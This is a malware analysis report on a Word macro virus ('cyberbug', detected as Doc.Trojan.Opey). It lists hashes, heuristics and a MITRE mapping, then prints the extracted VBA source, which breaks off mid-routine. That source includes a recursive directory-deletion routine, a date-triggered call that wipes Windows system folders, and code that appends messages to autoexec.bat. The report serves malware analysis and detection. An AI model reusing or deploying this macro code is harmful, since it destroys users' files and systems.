Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9d8987ae0118f4c0…

MALICIOUS

Office (OLE)

42.0 KB Created: 2001-02-23 08:50:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 360d98bcfb013c8bbe33ba9221ae29ec SHA-1: e7ab5a82a83082fd0acd0779da582b0c0fce2892 SHA-256: 9d8987ae0118f4c0771a7e252615b56ebbdb31da4b88aae8b58de3ab0c13d867
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits critical heuristic firings for OLE VBA macros, including AutoOpen and AutoClose, and is detected by ClamAV as Doc.Trojan.Opey-18. The embedded VBA macro 'cyberbug' contains functions like 'DelTree32' which are indicative of destructive behavior, and 'XCopy32' which suggests file copying or exfiltration. The presence of these macros strongly suggests a malicious intent to manipulate or damage the user's file system.

Heuristics 5

  • ClamAV: Doc.Trojan.Opey-18 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Opey-18
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 27774 bytes
SHA-256: b1addfae99c8803f721c5637787121afa4fb3a3dc809c87155bda661161b0382
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "cyberbug"
Public Success As Boolean
Public Sub DelTree32(DrvLtr As String, DeleteDIR As String)
Dim Result As String
Dim W As Integer
Dim X As Integer
Dim Y As Integer
Dim Z As Integer
Dim DIRList() As String
Dim FileList() As String
W = 0
Y = 0
Success = False
On Error Resume Next
ChDrive DrvLtr
If Not Err = 0 Then Exit Sub
ChDir (DrvLtr & "\" & DeleteDIR)
If Not Err = 0 Then Exit Sub
ChDrive DrvLtr
RmDir ("\" & DeleteDIR)
If Err = 0 Then
    On Error GoTo 0
    Success = True
    Exit Sub
Else
    Result = Dir((DrvLtr & "\" & DeleteDIR & "\*.*"), vbDirectory)
    Do
    If (Result = "." Or Result = "..") = False Then
        Exit Do
    Else
        Result = Dir()
    End If
    Loop
    Do
    If Result = "" Then Exit Do
    If (GetAttr(DrvLtr & "\" & DeleteDIR & "\" & Result)) = vbDirectory Then
        W = W + 1
        ReDim Preserve DIRList(W)
        DIRList(W) = Result
    Else
        Y = Y + 1
        ReDim Preserve FileList(Y)
        FileList(Y) = Result
    End If
    Result = Dir()
    Loop
    For X = 1 To W
        Call DelTree32(DrvLtr, (DeleteDIR & "\" & DIRList(X)))
        If Success = False Then Exit Sub
    Next X
    For Z = 1 To Y
        Kill (DrvLtr & "\" & DeleteDIR & "\" & FileList(Z))
    Next Z
    ChDrive DrvLtr
    RmDir ("\" & DeleteDIR)
    Success = True
    On Error GoTo 0
End If
End Sub

Public Sub XCopy32(SourceDrv As String, SourceDIR As String, DestDrv As String, Optional DestDIR As String)
Dim Result As String
Dim W As Integer
Dim X As Integer
Dim Y As Integer
Dim Z As Integer
Dim DIRList() As String
Dim FileList() As String
W = 0
Y = 0
Success = False
On Error Resume Next
ChDrive SourceDrv
If Not Err = 0 Then Exit Sub
ChDir (SourceDrv & "\" & SourceDIR)
If Not Err = 0 Then Exit Sub
ChDrive DestDrv
If Not Err = 0 Then Exit Sub
ChDir (DestDrv & "\" & DestDIR)
If Not Err = 0 Then
    Err = 0
    MkDir (DestDrv & "\" & DestDIR)
    If Not Err = 0 Then Exit Sub
End If
On Error GoTo 0
Result = Dir((SourceDrv & "\" & SourceDIR & "\*.*"), vbDirectory)
Do
If (Result = "." Or Result = "..") = False Then
    Exit Do
Else
    Result = Dir()
End If
Loop
Do
If Result = "" Then Exit Do
If (GetAttr(SourceDrv & "\" & SourceDIR & "\" & Result)) = vbDirectory Then
    W = W + 1
    ReDim Preserve DIRList(W)
    DIRList(W) = Result
Else
    Y = Y + 1
    ReDim Preserve FileList(Y)
    FileList(Y) = Result
End If
Result = Dir()
Loop
For X = 1 To W
    Call XCopy32(SourceDrv, (SourceDIR & "\" & DIRList(X)), DestDrv, (DestDIR & "\" & DIRList(X)))
    If Success = False Then Exit Sub
Next X
For Z = 1 To Y
    FileCopy (SourceDrv & "\" & SourceDIR & "\" & FileList(Z)), (DestDrv & "\" & DestDIR & "\" & FileList(Z))
Next Z
Success = True
End Sub
Sub greetings()
    On Error Resume Next
        autoexecfile$ = "c:\autoexec.bat"
        hFile = FreeFile
        line1$ = ""
        line2$ = "echo I think your system just crashed !!!!!"
            If (Month(Date) = 3) And (Day(Date) = 15) Then
                line1$ = "echo It's MICO's Birthday and he has a gift for you .."
                Call DelTree32("c:", "windows\system")
                Call DelTree32("c:", "windows\command")
                End If
                      
            If line1$ <> "" Then
                    Open autoexecfile$ For Append Access Write As hFile
                        Print #hFile, "@echo off"
                        Print #hFile, line1$
                        Print #hFile, "echo  hahahahahahaha !!!!!"
                        Print #hFile, line2$
                        Print #hFile, "echo from: CYBER"
                        Print #hFile, "pause"
                    Close hFile
                End If
End Sub
Sub OnlyYou(
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.